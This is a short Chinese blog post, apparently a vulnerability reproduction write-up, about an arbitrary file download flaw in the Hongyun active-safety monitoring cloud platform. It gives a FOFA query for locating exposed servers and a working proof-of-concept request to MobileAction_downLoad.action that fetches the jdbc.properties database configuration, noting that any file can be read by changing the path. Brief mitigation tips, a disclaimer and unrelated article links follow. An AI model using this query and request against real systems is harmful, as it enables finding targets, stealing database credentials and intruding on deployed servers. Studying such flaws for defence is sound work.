鸿运主动安全云平台任意文件下载漏洞复习

简介

深圳市强鸿电子有限公司鸿运主动安全监控云平台网页存在任意文件下载漏洞,攻击者可通过此漏洞下载网站配置文件等获得登录账号密码

漏洞复现

FOFA语法:body="./open/webApi.html"

获取网站数据库配置文件

POC:/808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties

访问 http://ip:port//808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties

可直接下载到该文件

替换path=后的文件可导致任意文件下载:

修复建议

访问白名单

添加访问控制

严格限制访问策略

免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!


结语

没有人规定,一朵花一定要成长为向日葵或者玫瑰。

相关推荐
嘟哩DuliDuli1 小时前
AI 视频局部重做,怎么避免破坏成片
人工智能·安全·ai·音视频·软件工程
weixin_618232301 小时前
OpenAI智能体“劫持”德国老网站当留言板
人工智能·安全
Neighbor_OldY2 小时前
【实战复盘】XSS跨站脚本攻击检测与应急处置:存储型/反射型/DOM型从发现到修复的完整指南
网络·安全·web安全
南京码讯光电技术有限公司3 小时前
工业防爆AP vs 普通工业AP:安全差距与合规红线
安全
luiyarch3 小时前
汽车电子ISO 26262功能安全系列(第34期):安全需求的可追溯性管理——让审核员心服口服的“证据链”
安全·汽车
qq_402995754 小时前
Secure Boot Part 2 —— 安全启动流程
arm开发·mcu·安全
木卫四科技4 小时前
从函数劫持到智能体控制平面:Hook 如何从 Linux-Android 演化到 Agent Runtime
android·linux·人工智能·安全
KKKlucifer4 小时前
AI深度赋能认证、授权、账号、审计全流程——智能身份安全防护体系实践
人工智能·安全
亚远景aspice4 小时前
亚远景-ASPICE+ISO26262+ISO/SAE21434 融合:仿真验证如何同时支撑功能安全、网络安全与 ASPICE 验证要求
安全·web安全·iso26262·aspice